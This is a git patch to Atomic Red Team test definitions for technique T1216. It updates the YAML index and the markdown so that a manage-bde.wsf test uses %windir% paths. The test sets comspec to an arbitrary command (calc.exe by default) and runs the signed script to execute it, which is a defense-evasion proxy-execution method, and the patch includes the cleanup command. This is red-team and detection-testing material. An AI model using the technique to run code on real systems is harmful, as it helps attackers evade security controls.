From 232e7e9a0e0e0533bfb8b6bf23383118c8a2da60 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 18 Aug 2020 22:39:29 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=clr2of8-patch-6 --- atomics/Indexes/index.yaml | 6 +++--- atomics/T1216/T1216.md | 6 +++--- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index a799a220..e9c414e6 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -33063,12 +33063,12 @@ defense-evasion: command_to_execute: description: A command to execute. type: Path - default: C:\Windows\System32\calc.exe + default: "%windir%\\System32\\calc.exe" executor: command: | set comspec=#{command_to_execute} - cscript manage-bde.wsf - cleanup_command: 'set comspec=C:\Windows\System32\cmd.exe + cscript %windir%\System32\manage-bde.wsf + cleanup_command: 'set comspec=%windir%\System32\cmd.exe ' name: command_prompt diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md index c2802d6b..c5ac55a8 100644 --- a/atomics/T1216/T1216.md +++ b/atomics/T1216/T1216.md @@ -52,7 +52,7 @@ Executes the signed manage-bde.wsf script with options to execute an arbitrary c #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| command_to_execute | A command to execute. | Path | C:\Windows\System32\calc.exe| +| command_to_execute | A command to execute. | Path | %windir%\System32\calc.exe| #### Attack Commands: Run with `command_prompt`! @@ -60,12 +60,12 @@ Executes the signed manage-bde.wsf script with options to execute an arbitrary c ```cmd set comspec=#{command_to_execute} -cscript manage-bde.wsf +cscript %windir%\System32\manage-bde.wsf ``` #### Cleanup Commands: ```cmd -set comspec=C:\Windows\System32\cmd.exe +set comspec=%windir%\System32\cmd.exe ```